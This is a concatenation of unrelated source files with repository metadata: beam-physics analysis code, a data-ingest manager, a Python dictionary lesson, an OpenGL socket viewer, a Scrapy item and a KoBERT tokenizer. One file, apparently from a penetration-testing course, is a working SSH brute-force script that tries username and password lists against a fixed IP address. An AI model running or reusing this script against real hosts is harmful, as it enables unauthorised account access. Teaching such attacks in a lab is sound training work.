self.slice_data(self.cpx/self.cpz) pybins = self.slice_data(self.cpy/self.cpz) pzbins = self.slice_data(((self.cpz/np.mean(self.cp)) - 1)) emitbins = list(zip(xbins, ybins, zbins, pxbins, pybins, pzbins)) self.slice['6D_Volume'] = np.array([self.volume6D(*a) for a in emitbins]) return self.slice['6D_Volume'] @property def slice_density(self): if not hasattr(self,'_tbins') or not hasattr(self,'_cpbins'): self.bin_time() xbins = self.slice_data(self.x) volume = self.slice_6D_Volume self.slice['Density'] = np.array([len(x)/v for x, v in zip(xbins, volume)]) return self.slice['Density'] @property def slice_horizontal_emittance(self): if not hasattr(self,'_tbins') or not hasattr(self,'_cpbins'): self.bin_time() emitbins = self.emitbins(self.x, self.xp) self.slice['Horizontal_Emittance'] = np.array([self.emittance(xbin, xpbin) if len(cpbin) > 0 else 0 for xbin, xpbin, cpbin in emitbins]) return self.slice['Horizontal_Emittance'] @property def slice_vertical_emittance(self): if not hasattr(self,'_tbins') or not hasattr(self,'_cpbins'): self.bin_time() emitbins = self.emitbins(self.y, self.yp) self.slice['Vertical_Emittance'] = np.array([self.emittance(ybin, ypbin) if len(cpbin) > 0 else 0 for ybin, ypbin, cpbin in emitbins]) return self.slice['Vertical_Emittance'] @property def slice_normalized_horizontal_emittance(self): if not hasattr(self,'_tbins') or not hasattr(self,'_cpbins'): self.bin_time() emitbins = self.emitbins(self.x, self.xp) self.slice['Normalized_Horizontal_Emittance'] = np.array([self.emittance(xbin, xpbin, cpbin) if len(cpbin) > 0 else 0 for xbin, xpbin, cpbin in emitbins]) return self.slice['Normalized_Horizontal_Emittance'] @property def slice_normalized_vertical_emittance(self): if not hasattr(self,'_tbins') or not hasattr(self,'_cpbins'): self.bin_time() emitbins = self.emitbins(self.y, self.yp) self.slice['Normalized_Vertical_Emittance'] = np.array([self.emittance(ybin, ypbin, cpbin) if len(cpbin) > 0 else 0 for ybin, ypbin, cpbin in emitbins]) return self.slice['Normalized_Vertical_Emittance'] @property def slice_normalized_mve_horizontal_emittance(self): if not hasattr(self,'_tbins') or not hasattr(self,'_cpbins'): self.bin_time() emitbins = self.emitbins(self.x, self.xp) self.slice['Normalized_mve_Horizontal_Emittance'] = np.array([self.mve_emittance(xbin, xpbin, cpbin) if len(cpbin) > 0 else 0 for xbin, xpbin, cpbin in emitbins]) return self.slice['Normalized_mve_Horizontal_Emittance'] @property def slice_normalized_mve_vertical_emittance(self): if not hasattr(self,'_tbins') or not hasattr(self,'_cpbins'): self.bin_time() emitbins = self.emitbins(self.y, self.yp) self.slice['Normalized_mve_Vertical_Emittance'] = np.array([self.mve_emittance(ybin, ypbin, cpbin) if len(cpbin) > 0 else 0 for ybin, ypbin, cpbin in emitbins]) return self.slice['Normalized_mve_Vertical_Emittance'] @property def slice_peak_current(self): if not hasattr(self,'_hist'): self.bin_time() f = lambda bin: self.charge / len(self.t) * (len(bin) / (max(bin) - min(bin))) if len(bin) > 1 else 0 # f = lambda bin: len(bin) if len(bin) > 1 else 0 self.slice['Peak_Current'] = np.array([f(bin) for bin in self._tbins]) return abs(self.slice['Peak_Current']) @property def slice_max_peak_current_slice(self): peakI = self.slice_peak_current self.slice['Max_Peak_Current_Slice'] = list(abs(peakI)).index(max(abs(peakI))) return self.slice['Max_Peak_Current_Slice'] @property def slice_beta_x(self): xbins = self.slice_data(self.beam['x']) exbins = self.slice_horizontal_emittance emitbins = list(zip(xbins, exbins)) self.slice['slice_beta_x'] = np.array([self.covariance(x, x)/ex if ex > 0 else 0 for x, ex in emitbins]) return self.slice['slice_beta_x'] @property def slice_alpha_x(self): xbins = self.slice_data(self.x) xpbins = self.slice_data(self.xp) exbins = self.slice_horizontal_emittance emitbins = list(zip(xbins, xpbins, exbins)) self.slice['slice_alpha_x'] = np.array([-1*self.covariance(x, xp)/ex if ex > 0 else 0 for x, xp, ex in emitbins]) return self.slice['slice_alpha_x'] @property def slice_gamma_x(self): self.twiss['gamma_x'] = self.covariance(self.xp,self.xp) / self.horizontal_emittance return self.twiss['gamma_x'] @property def slice_beta_y(self): ybins = self.slice_data(self.beam['y']) eybins = self.slice_vertical_emittance emitbins = list(zip(ybins, eybins)) self.slice['slice_beta_y'] = np.array([self.covariance(y, y)/ey if ey > 0 else 0 for y, ey in emitbins]) return self.slice['slice_beta_y'] @property def slice_alpha_y(self): ybins = self.slice_data(self.y) ypbins = self.slice_data(self.yp) eybins = self.slice_vertical_emittance emitbins = list(zip(ybins, ypbins, eybins)) self.slice['slice_alpha_y'] = np.array([-1*self.covariance(y,yp)/ey if ey > 0 else 0 for y, yp, ey in emitbins]) return self.twiss['slice_alpha_y'] @property def slice_gamma_y(self): self.twiss['gamma_y'] = self.covariance(self.yp,self.yp) / self.vertical_emittance return self.twiss['gamma_y'] def sliceAnalysis(self, density=False): self.slice = {} self.bin_time() peakIPosition = self.slice_max_peak_current_slice slice_density = self.slice_density[peakIPosition] if density else 0 return self.slice_peak_current[peakIPosition], \ np.std(self.slice_peak_current), \ self.slice_relative_momentum_spread[peakIPosition], \ self.slice_normalized_horizontal_emittance[peakIPosition], \ self.slice_normalized_vertical_emittance[peakIPosition], \ self.slice_momentum[peakIPosition], \ self.slice_density[peakIPosition], def mvesliceAnalysis(self): self.slice = {} self.bin_time() peakIPosition = self.slice_max_peak_current_slice return self.slice_peak_current[peakIPosition], \ np.std(self.slice_peak_current), \ self.slice_relative_momentum_spread[peakIPosition], \ self.slice_normalized_mve_horizontal_emittance[peakIPosition], \ self.slice_normalized_mve_vertical_emittance[peakIPosition], \ self.slice_momentum[peakIPosition], \ self.slice_density[peakIPosition], @property def chirp(self): self.bin_time() slice_current_centroid_indices = [] slice_momentum_centroid = [] peakIPosition = self.slice_max_peak_current_slice peakI = self.slice_peak_current[peakIPosition] slicemomentum = self.slice_momentum for index, slice_current in enumerate(self.slice_peak_current): if abs(peakI - slice_current) < (peakI * 0.75): slice_current_centroid_indices.append(index) for index in slice_current_centroid_indices: slice_momentum_centroid.append(slicemomentum[index]) chirp = (1e-18 * (slice_momentum_centroid[-1] - slice_momentum_centroid[0]) / (len(slice_momentum_centroid) * self.slice_length)) return chirp @property def x(self): return self.beam['x'] @property def y(self): return self.beam['y'] @property def z(self): return self.beam['z'] @property def zn(self): return self.beam['z']-np.mean(self.beam['z']) @property def px(self): return self.beam['px'] @property def py(self): return self.beam['py'] @property def pz(self): return self.beam['pz'] @property def cpx(self): return self.beam['px'] / self.q_over_c @property def cpy(self): return self.beam['py'] / self.q_over_c @property def cpz(self): return self.beam['pz'] / self.q_over_c @property def xp(self): return np.arctan(self.px/self.pz) @property def yp(self): return np.arctan(self.py/self.pz) @property def t(self): return self.beam['t'] @property def p(self): return self.cp * self.q_over_c @property def cp(self): return np.sqrt(self.cpx**2 + self.cpy**2 + self.cpz**2) @property def Brho(self): return np.mean(self.p) / constants.elementary_charge @property def gamma(self): return np.sqrt(1+(self.cp/self.E0_eV)**2) @property def BetaGamma(self): return self.cp/self.E0_eV @property def vx(self): velocity_conversion = 1 / (constants.m_e * self.gamma) return velocity_conversion * self.px @property def vy(self): velocity_conversion = 1 / (constants.m_e * self.gamma) return velocity_conversion * self.py @property def vz(self): velocity_conversion = 1 / (constants.m_e * self.gamma) return velocity_conversion * self.pz @property def Bx(self): return self.vx / constants.speed_of_light @property def By(self): return self.vy / constants.speed_of_light @property def Bz(self): return self.vz / constants.speed_of_light @property def charge(self): return self.beam['total_charge'] @property def sigma_z(self): return self.rms(self.Bz*constants.speed_of_light*(self.beam['t'] - np.mean(self.beam['t']))) @property def momentum_spread(self): return self.cp.std()/np.mean(self.cp) @property def linear_chirp_z(self): return -1*self.rms(self.Bz*constants.speed_of_light*self.t)/self.momentum_spread/100 def computeCorrelations(self, x, y): xAve = np.mean(x) yAve = np.mean(y) C11 = 0 C12 = 0 C22 = 0 for i, ii in enumerate(x): dx = x[i] - xAve dy = y[i] - yAve C11 += dx*dx C12 += dx*dy C22 += dy*dy C11 /= len(x) C12 /= len(x) C22 /= len(x) return C11, C12, C22 @property def eta_x(self): return self.calculate_etax()[0] @property def eta_xp(self): return self.calculate_etax()[1] def calculate_etax(self): p = self.cp pAve = np.mean(p) p = [a / pAve - 1 for a in p] S11, S16, S66 = self.computeCorrelations(self.x, self.cp) eta1 = -pAve * S16/S66 if S66 else 0 S22, S26, S66 = self.computeCorrelations(self.xp, self.cp) etap1 = -pAve * S26/S66 if S66 else 0 return eta1, etap1, np.mean(self.t) def performTransformation(self, x, xp, beta=False, alpha=False, nEmit=False): p = self.cp pAve = np.mean(p) p = [a / pAve - 1 for a in p] S11, S16, S66 = self.computeCorrelations(self.x, self.cp) eta1 = S16/S66 if S66 else 0 S22, S26, S66 = self.computeCorrelations(self.xp, self.cp) etap1 = S26/S66 if S66 else 0 for i, ii in enumerate(x): x[i] -= p[i] * eta1 xp[i] -= p[i] * etap1 S11, S12, S22 = self.computeCorrelations(x, xp) emit = np.sqrt(S11*S22 - S12**2) beta1 = S11/emit alpha1 = -S12/emit beta2 = beta if beta is not False else beta1 alpha2 = alpha if alpha is not False else alpha1 R11 = beta2/np.sqrt(beta1*beta2) R12 = 0 R21 = (alpha1-alpha2)/np.sqrt(beta1*beta2) R22 = beta1/np.sqrt(beta1*beta2) if nEmit is not False: factor = np.sqrt(nEmit / (emit*pAve)) R11 *= factor R12 *= factor R22 *= factor R21 *= factor for i, ii in enumerate(x): x0 = x[i] xp0 = xp[i] x[i] = R11 * x0 + R12 * xp0 xp[i] = R21*x0 + R22*xp0 return x, xp def rematchXPlane(self, beta=False, alpha=False, nEmit=False): x, xp = self.performTransformation(self.x, self.xp, beta, alpha, nEmit) self.beam['x'] = x self.beam['xp'] = xp cpz = self.cp / np.sqrt(self.beam['xp']**2 + self.yp**2 + 1) cpx = self.beam['xp'] * cpz cpy = self.yp * cpz self.beam['px'] = cpx * self.q_over_c self.beam['py'] = cpy * self.q_over_c self.beam['pz'] = cpz * self.q_over_c def rematchYPlane(self, beta=False, alpha=False, nEmit=False): y, yp = self.performTransformation(self.y, self.yp, beta, alpha, nEmit) self.beam['y'] = y self.beam['yp'] = yp cpz = self.cp / np.sqrt(self.xp**2 + self.beam['yp']**2 + 1) cpx = self.xp * cpz cpy = self.beam['yp'] * cpz self.beam['px'] = cpx * self.q_over_c self.beam['py'] = cpy * self.q_over_c self.beam['pz'] = cpz * self.q_over_c def performTransformationPeakISlice(self, xslice, xpslice, x, xp, beta=False, alpha=False, nEmit=False): p = self.cp pAve = np.mean(p) p = [a / pAve - 1 for a in p] S11, S16, S66 = self.computeCorrelations(self.x, self.cp) eta1 = S16/S66 if S66 else 0 S22, S26, S66 = self.computeCorrelations(self.xp, self.cp) etap1 = S26/S66 if S66 else 0 for i, ii in enumerate(x): x[i] -= p[i] * eta1 xp[i] -= p[i] * etap1 S11, S12, S22 = self.computeCorrelations(xslice, xpslice) emit = np.sqrt(S11*S22 - S12**2) beta1 = S11/emit alpha1 = -S12/emit beta2 = beta if beta is not False else beta1 alpha2 = alpha if alpha is not False else alpha1 R11 = beta2/np.sqrt(beta1*beta2) R12 = 0 R21 = (alpha1-alpha2)/np.sqrt(beta1*beta2) R22 = beta1/np.sqrt(beta1*beta2) if nEmit is not False: factor = np.sqrt(nEmit / (emit*pAve)) R11 *= factor R12 *= factor R22 *= factor R21 *= factor for i, ii in enumerate(x): x0 = x[i] xp0 = xp[i] x[i] = R11 * x0 + R12 * xp0 xp[i] = R21*x0 + R22*xp0 return x, xp def rematchXPlanePeakISlice(self, beta=False, alpha=False, nEmit=False): peakIPosition = self.slice_max_peak_current_slice xslice = self.slice_data(self.x)[peakIPosition] xpslice = self.slice_data(self.xp)[peakIPosition] x, xp = self.performTransformationPeakISlice(xslice, xpslice, self.x, self.xp, beta, alpha, nEmit) self.beam['x'] = x self.beam['xp'] = xp cpz = self.cp / np.sqrt(self.beam['xp']**2 + self.yp**2 + 1) cpx = self.beam['xp'] * cpz cpy = self.yp * cpz self.beam['px'] = cpx * self.q_over_c self.beam['py'] = cpy * self.q_over_c self.beam['pz'] = cpz * self.q_over_c def rematchYPlanePeakISlice(self, beta=False, alpha=False, nEmit=False): peakIPosition = self.slice_max_peak_current_slice yslice = self.slice_data(self.y)[peakIPosition] ypslice = self.slice_data(self.yp)[peakIPosition] y, yp = self.performTransformationPeakISlice(yslice, ypslice, self.y, self.yp, beta, alpha, nEmit) self.beam['y'] = y self.beam['yp'] = yp cpz = self.cp / np.sqrt(self.xp**2 + self.beam['yp']**2 + 1) cpx = self.xp * cpz cpy = self.beam['yp'] * cpz self.beam['px'] = cpx * self.q_over_c self.beam['py'] = cpy * self.q_over_c self.beam['pz'] = cpz * self.q_over_c @property def Sx(self): return np.sqrt(self.covariance(self.x,self.x)) @property def Sy(self): return np.sqrt(self.covariance(self.y,self.y))
a0fb061548bfd69cb764cc4823ae29227aa804a6
0e8ab63a60fd03b1778aa392c0b11fedd88409e4
/ingest/ingest/manager.py
8ed7b3d707ce64b45eb7b82fa5323c3a84a15a39
[]
no_license
Kyeongrok/dms
babeb19115355c3d930c94c89ca55d3e5de2dc55
a67c446f0ffd3f9a1812de961ef915c405a4096f
refs/heads/master
2021-06-23T22:44:18.881538
2019-09-26T03:42:13
2019-09-26T03:42:13
210,993,619
0
0
null
2021-03-25T22:57:32
2019-09-26T03:41:24
Python
UTF-8
Python
false
false
2,747
py
import abc import logging import os from dmsclient.client import DMSClient from dmsclient.exceptions import DMSClientException from ingest import util from ingest.logger import ElasticsearchHandler, JournalFormatter class AbstractIngestManager(abc.ABC): def __init__(self, config, mount_path, reader_id, cartridge_id): self.log = logging.getLogger('ingest.manager') self.config = config self.thread_count = config['general']['threads'] self.check_mountpoints = config['general']['check_mountpoints'] self.ignore_directories = config['general']['ignore_directories'] self.log_to_es = config['general']['log_to_es'] self.mount_path = mount_path self.reader_id = reader_id self.cartridge_id = cartridge_id self.client = DMSClient(es_endpoint=config['elasticsearch']['endpoint'], es_user=config['elasticsearch']['user'], es_password=config['elasticsearch']['password'], create_templates=config['elasticsearch']['create_templates'], verify_templates=config['elasticsearch']['verify_templates']) if self.log_to_es: handler = ElasticsearchHandler(self.client) formatter = JournalFormatter() handler.setFormatter(formatter) root_logger = logging.getLogger('ingest') root_logger.addHandler(handler) if not self.mount_path.startswith('rsync://'): try: self.mount_path = os.path.abspath(self.mount_path) self.__check_path(self.mount_path, readwrite=False) except Exception as e: self.log.error('Error checking the input path. {}'.format(str(e),)) raise e def update_reader(self, message): if self.reader_id: self.client.readers.set_message(self.reader_id, message) def set_cartridge_workflow_type(self, cartridge_id, workflow_type): if self.cartridge_id: self.client.cartridges.set_workflow_type(self.cartridge_id, workflow_type) @abc.abstractmethod def run(self): pass def __check_path(self, path, readwrite=False): if path.startswith('rsync://'): return if readwrite: self.log.info("Checking write permissions on path '%s'" % (path,)) if not util.isWritable(path): raise Exception('Cannot write to directory: %s' % (path,)) else: self.log.info("Checking read permissions on path '%s'" % (path,)) if not util.isReadable(path): raise Exception('Cannot read from directory: %s' % (path,))
1d3aa6d35106c3460d100c2156236cc0871312ec
fc5becca3e2e48a444b512e059df1cd21601829b
/Aulas/Aula19A.py
4d8089077e3bdd14ae5f3b3b6ced29a4100d4556
[ "MIT" ]
permissive
Felix-xilef/Curso-de-Python
c44bf8c22b393aefaed3a2bb3127ef7999e27fb8
cdff7c7f3850e6326e274c8c1987b9e1a18ce910
refs/heads/master
2021-05-19T11:09:22.644638
2020-04-01T22:09:02
2020-04-01T22:09:02
251,665,966
0
0
null
null
null
null
UTF-8
Python
false
false
482
py
# Dicionários {} / dict() - como uma lista, porém o indice pode ser definido (key) pessoas = {'nome': 'Felix', 'sexo': 'm', 'idade': 18} print(pessoas) print(pessoas['nome']) print(pessoas['idade']) print(pessoas.values()) print(pessoas.keys()) print(pessoas.items()) for k, v in pessoas.items(): print(k, '=', v) del pessoas['sexo'] print(pessoas) pessoas['nome'] = 'Gustavo' print(pessoas) pessoas['peso'] = 74 print(pessoas) input('\n\nPressione <enter> para continuar')
c4b90c1495df475c554108312c8e2a94b88ee10d
ef66e297a49d04098d98a711ca3fda7b8a9a657c
/Python/display.py
1b280e0ad29c46c1e08530191b08e20ef0df52eb
[]
no_license
breezy1812/MyCodes
34940357954dad35ddcf39aa6c9bc9e5cd1748eb
9e3d117d17025b3b587c5a80638cb8b3de754195
refs/heads/master
2020-07-19T13:36:05.270908
2018-12-15T08:54:30
2018-12-15T08:54:30
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,897
py
# coding: UTF-8 __metaclass__ = type from OpenGL.GL import * from OpenGL.GLU import * from OpenGL.GLUT import * import random import socket i = 0 winId = 0 s = None poses = [] SIZE = [800, 600] clear = True def Draw(): global poses global clear glEnable(GL_POINT_SMOOTH) if clear: glClear(GL_COLOR_BUFFER_BIT) clear = False glPointSize(5) glBegin(GL_POINTS) for item in poses: try: if item[2] == 1: glVertex2f(item[0], item[1]) elif item[2] == -1: clear = True except: pass poses = [] glEnd() glFlush() def Update(): global s global poses try: data = s.recv(4096).split('|') poses = map(lambda x: map(lambda y: int(y), x.split(',')), data) if not data: raise Exception except Exception, e: print e s.close() sys.exit(0) for item in poses: item[0] = (item[0]*1.0/SIZE[0]*200-100)/100.0 item[1] = -((item[1]*1.0/SIZE[1]*200-100))/100.0 print poses glutPostRedisplay() def keyboardHit(key, mouseX, mouseY): if key == 'q': global s glutDestroyWindow(winId) s.close() sys.exit() def mouseHit(button, state, mouseX, mouseY): pass def mouseMotion(mouseX, mouseY): pass def main(): global winId global s s = socket.socket() host = socket.gethostname() s.connect((host, 1234)) glutInit() glutInitDisplayMode(GLUT_SINGLE | GLUT_RGBA) glutInitWindowSize(SIZE[0], SIZE[1]) winId = glutCreateWindow("David") glutDisplayFunc(Draw) glutIdleFunc(Update) glutKeyboardFunc(keyboardHit) glutMouseFunc(mouseHit) glutMotionFunc(mouseMotion) glutMainLoop() if __name__ == '__main__': try: main() except Exception, e: print e
e57f6351bc13444d18ec9ae6b667d6e3d4b37ed4
a7e75fcd05aa8ebf2066c4eb0a05496042dd5ded
/better_work_data/better_work_data/items.py
ab7aeb32e62a563ca44dce609a18c2de91fd0b79
[ "MIT" ]
permissive
JackDan9/miniProgram
d6fe14fced0f9a154d01a6f950ab26325ed445de
d60a33275334b4caa3c15d5c6196938fb800505b
refs/heads/master
2023-02-10T13:26:23.453536
2023-01-09T03:41:43
2023-01-09T03:41:43
132,235,452
1
0
MIT
2023-02-08T00:42:41
2018-05-05T09:55:32
JavaScript
UTF-8
Python
false
false
515
py
# Define here the models for your scraped items # # See documentation in: # https://docs.scrapy.org/en/latest/topics/items.html import scrapy class BetterWorkDataItem(scrapy.Item): # define the fields for your item here like: # name = scrapy.Field() order = scrapy.Field() title = scrapy.Field() summary = scrapy.Field() source_type = scrapy.Field() source_name = scrapy.Field() publish_on = scrapy.Field() created_on = scrapy.Field() updated_on = scrapy.Field() pass
1dca65b0e31944c67b64eb4542abf988338475ba
882026439fb24cacbd1b671ae43bd0da2ac734df
/tokenization_kobert.py
34d3fa079c7717814a8dd0d6598c01ac5a33c59f
[ "Apache-2.0" ]
permissive
fightnyy/Stock_Prediction
94fa5761a1860429d033ecc735d9fa89d75667b8
f0dd42bd511e74876ede92c4d10aa6384d542613
refs/heads/master
2023-07-11T04:30:48.546817
2021-08-19T06:30:01
2021-08-19T06:30:01
338,271,910
0
0
null
null
null
null
UTF-8
Python
false
false
11,022
py
# coding=utf-8 # Copyright 2018 Google AI, Google Brain and Carnegie Mellon University Authors and the HuggingFace Inc. team and Jangwon Park # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Tokenization classes for KoBert model.""" import logging import os import sentencepiece as spm import unicodedata from shutil import copyfile from transformers import PreTrainedTokenizer logger = logging.getLogger(__name__) VOCAB_FILES_NAMES = {"vocab_file": "tokenizer_78b3253a26.model", "vocab_txt": "vocab.txt"} PRETRAINED_VOCAB_FILES_MAP = { "vocab_file": { "monologg/kobert": "https://s3.amazonaws.com/models.huggingface.co/bert/monologg/kobert/tokenizer_78b3253a26.model", "monologg/kobert-lm": "https://s3.amazonaws.com/models.huggingface.co/bert/monologg/kobert-lm/tokenizer_78b3253a26.model", "monologg/distilkobert": "https://s3.amazonaws.com/models.huggingface.co/bert/monologg/distilkobert/tokenizer_78b3253a26.model" }, "vocab_txt": { "monologg/kobert": "https://s3.amazonaws.com/models.huggingface.co/bert/monologg/kobert/vocab.txt", "monologg/kobert-lm": "https://s3.amazonaws.com/models.huggingface.co/bert/monologg/kobert-lm/vocab.txt", "monologg/distilkobert": "https://s3.amazonaws.com/models.huggingface.co/bert/monologg/distilkobert/vocab.txt" } } PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES = { "monologg/kobert": 512, "monologg/kobert-lm": 512, "monologg/distilkobert": 512 } PRETRAINED_INIT_CONFIGURATION = { "monologg/kobert": {"do_lower_case": False}, "monologg/kobert-lm": {"do_lower_case": False}, "monologg/distilkobert": {"do_lower_case": False} } SPIECE_UNDERLINE = u'▁' class KoBertTokenizer(PreTrainedTokenizer): """ SentencePiece based tokenizer. Peculiarities: - requires `SentencePiece <https://github.com/google/sentencepiece>`_ """ vocab_files_names = VOCAB_FILES_NAMES pretrained_vocab_files_map = PRETRAINED_VOCAB_FILES_MAP pretrained_init_configuration = PRETRAINED_INIT_CONFIGURATION max_model_input_sizes = PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES def __init__( self, vocab_file, vocab_txt, do_lower_case=False, remove_space=True, keep_accents=False, unk_token="[UNK]", sep_token="[SEP]", pad_token="[PAD]", cls_token="[CLS]", mask_token="[MASK]", **kwargs): super().__init__( unk_token=unk_token, sep_token=sep_token, pad_token=pad_token, cls_token=cls_token, mask_token=mask_token, **kwargs ) # Build vocab self.token2idx = dict() self.idx2token = [] with open(vocab_txt, 'r', encoding='utf-8') as f: for idx, token in enumerate(f): token = token.strip() self.token2idx[token] = idx self.idx2token.append(token) try: import sentencepiece as spm except ImportError: logger.warning("You need to install SentencePiece to use KoBertTokenizer: https://github.com/google/sentencepiece" "pip install sentencepiece") self.do_lower_case = do_lower_case self.remove_space = remove_space self.keep_accents = keep_accents self.vocab_file = vocab_file self.vocab_txt = vocab_txt self.sp_model = spm.SentencePieceProcessor() self.sp_model.Load(vocab_file) @property def vocab_size(self): return len(self.idx2token) def get_vocab(self): return dict(self.token2idx, **self.added_tokens_encoder) def __getstate__(self): state = self.__dict__.copy() state["sp_model"] = None return state def __setstate__(self, d): self.__dict__ = d try: import sentencepiece as spm except ImportError: logger.warning("You need to install SentencePiece to use KoBertTokenizer: https://github.com/google/sentencepiece" "pip install sentencepiece") self.sp_model = spm.SentencePieceProcessor() self.sp_model.Load(self.vocab_file) def preprocess_text(self, inputs): if self.remove_space: outputs = " ".join(inputs.strip().split()) else: outputs = inputs outputs = outputs.replace("``", '"').replace("''", '"') if not self.keep_accents: outputs = unicodedata.normalize('NFKD', outputs) outputs = "".join([c for c in outputs if not unicodedata.combining(c)]) if self.do_lower_case: outputs = outputs.lower() return outputs def _tokenize(self, text, return_unicode=True, sample=False): """ Tokenize a string. """ text = self.preprocess_text(text) if not sample: pieces = self.sp_model.EncodeAsPieces(text) else: pieces = self.sp_model.SampleEncodeAsPieces(text, 64, 0.1) new_pieces = [] for piece in pieces: if len(piece) > 1 and piece[-1] == str(",") and piece[-2].isdigit(): cur_pieces = self.sp_model.EncodeAsPieces(piece[:-1].replace(SPIECE_UNDERLINE, "")) if piece[0] != SPIECE_UNDERLINE and cur_pieces[0][0] == SPIECE_UNDERLINE: if len(cur_pieces[0]) == 1: cur_pieces = cur_pieces[1:] else: cur_pieces[0] = cur_pieces[0][1:] cur_pieces.append(piece[-1]) new_pieces.extend(cur_pieces) else: new_pieces.append(piece) return new_pieces def _convert_token_to_id(self, token): """ Converts a token (str/unicode) in an id using the vocab. """ return self.token2idx.get(token, self.token2idx[self.unk_token]) def _convert_id_to_token(self, index, return_unicode=True): """Converts an index (integer) in a token (string/unicode) using the vocab.""" return self.idx2token[index] def convert_tokens_to_string(self, tokens): """Converts a sequence of tokens (strings for sub-words) in a single string.""" out_string = "".join(tokens).replace(SPIECE_UNDERLINE, " ").strip() return out_string def build_inputs_with_special_tokens(self, token_ids_0, token_ids_1=None): """ Build model inputs from a sequence or a pair of sequence for sequence classification tasks by concatenating and adding special tokens. A KoBERT sequence has the following format: single sequence: [CLS] X [SEP] pair of sequences: [CLS] A [SEP] B [SEP] """ if token_ids_1 is None: return [self.cls_token_id] + token_ids_0 + [self.sep_token_id] cls = [self.cls_token_id] sep = [self.sep_token_id] return cls + token_ids_0 + sep + token_ids_1 + sep def get_special_tokens_mask(self, token_ids_0, token_ids_1=None, already_has_special_tokens=False): """ Retrieves sequence ids from a token list that has no special tokens added. This method is called when adding special tokens using the tokenizer ``prepare_for_model`` or ``encode_plus`` methods. Args: token_ids_0: list of ids (must not contain special tokens) token_ids_1: Optional list of ids (must not contain special tokens), necessary when fetching sequence ids for sequence pairs already_has_special_tokens: (default False) Set to True if the token list is already formated with special tokens for the model Returns: A list of integers in the range [0, 1]: 0 for a special token, 1 for a sequence token. """ if already_has_special_tokens: if token_ids_1 is not None: raise ValueError( "You should not supply a second sequence if the provided sequence of " "ids is already formated with special tokens for the model." ) return list(map(lambda x: 1 if x in [self.sep_token_id, self.cls_token_id] else 0, token_ids_0)) if token_ids_1 is not None: return [1] + ([0] * len(token_ids_0)) + [1] + ([0] * len(token_ids_1)) + [1] return [1] + ([0] * len(token_ids_0)) + [1] def create_token_type_ids_from_sequences(self, token_ids_0, token_ids_1=None): """ Creates a mask from the two sequences passed to be used in a sequence-pair classification task. A KoBERT sequence pair mask has the following format: 0 0 0 0 0 0 0 0 0 0 1 1 1 1 1 1 1 1 1 1 1 | first sequence | second sequence if token_ids_1 is None, only returns the first portion of the mask (0's). """ sep = [self.sep_token_id] cls = [self.cls_token_id] if token_ids_1 is None: return len(cls + token_ids_0 + sep) * [0] return len(cls + token_ids_0 + sep) * [0] + len(token_ids_1 + sep) * [1] def save_vocabulary(self, save_directory): """ Save the sentencepiece vocabulary (copy original file) and special tokens file to a directory. """ if not os.path.isdir(save_directory): logger.error("Vocabulary path ({}) should be a directory".format(save_directory)) return # 1. Save sentencepiece model out_vocab_model = os.path.join(save_directory, VOCAB_FILES_NAMES["vocab_file"]) if os.path.abspath(self.vocab_file) != os.path.abspath(out_vocab_model): copyfile(self.vocab_file, out_vocab_model) # 2. Save vocab.txt index = 0 out_vocab_txt = os.path.join(save_directory, VOCAB_FILES_NAMES["vocab_txt"]) with open(out_vocab_txt, "w", encoding="utf-8") as writer: for token, token_index in sorted(self.token2idx.items(), key=lambda kv: kv[1]): if index != token_index: logger.warning( "Saving vocabulary to {}: vocabulary indices are not consecutive." " Please check that the vocabulary is not corrupted!".format(out_vocab_txt) ) index = token_index writer.write(token + "\n") index += 1 return out_vocab_model, out_vocab_txt
dc52624b745e24996b18b3d581240cefcbe6d403
04934bc61ceab01ad24ab1672461a1b103884e91
/ssh/sshconn_002.py
da12bca4af6f78377d324cb95c618bfe4ad0dab7
[]
no_license
aiedonline/aulapentest
05f31d0410493f02361fe778ab02d584aa84ef5e
1dd28feb95941f49205af836c9013283b4cb6b99
refs/heads/main
2023-08-18T10:22:19.596876
2021-09-26T20:14:50
2021-09-26T20:14:50
402,219,644
0
0
null
null
null
null
UTF-8
Python
false
false
1,257
py
#!/usr/bin/python import sys; from netmiko import Netmiko ip = "11.11.11.171"; print("\033[1;33m[*] - SSH Bruteforce Attack", " \033[0;0m"); print("\033[1;33m[*] - SSH target", ip, " \033[0;0m"); with open("user.txt") as users: users = users.readlines(); for user in users: passwords_testados = []; with open("password.txt") as passwords: passwords = passwords.readlines(); passwords.insert(0, user); # a senha mais usada e o proprio usuario for password in passwords: try: if password in passwords_testados: continue; sshconn = Netmiko(ip, username= user.strip(), password=password.strip(), device_type="linux"); sshconn.disconnect(); print("\033[1;32m[+] SUCES PARA", user.strip(), password.strip(), " \033[0;0m"); except KeyboardInterrupt: print( 'Usuarqio quer sair.'); sys.exit(0); except: print("\033[1;31m[-] FALHA PARA", user.strip(), password.strip(), " \033[0;0m"); finally: passwords_testados.insert(0, password);
6fdea119f9c9239b63eda3db6b7c2b1d0233e66d
ca7aa979e7059467e158830b76673f5b77a0f5a3
/Python_codes/p02585/s776126936.py
78cc9d2cac5fd2a3bfb611ed540139e54d721039
[]
no_license
Aasthaengg/IBMdataset
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
refs/heads/main
2023-04-22T10:22:44.763102
2021-05-13T17:27:22
2021-05-13T17:27:22
367,112,348
0
0
null
null
null
null
UTF-8
Python
false
false
2,175
py
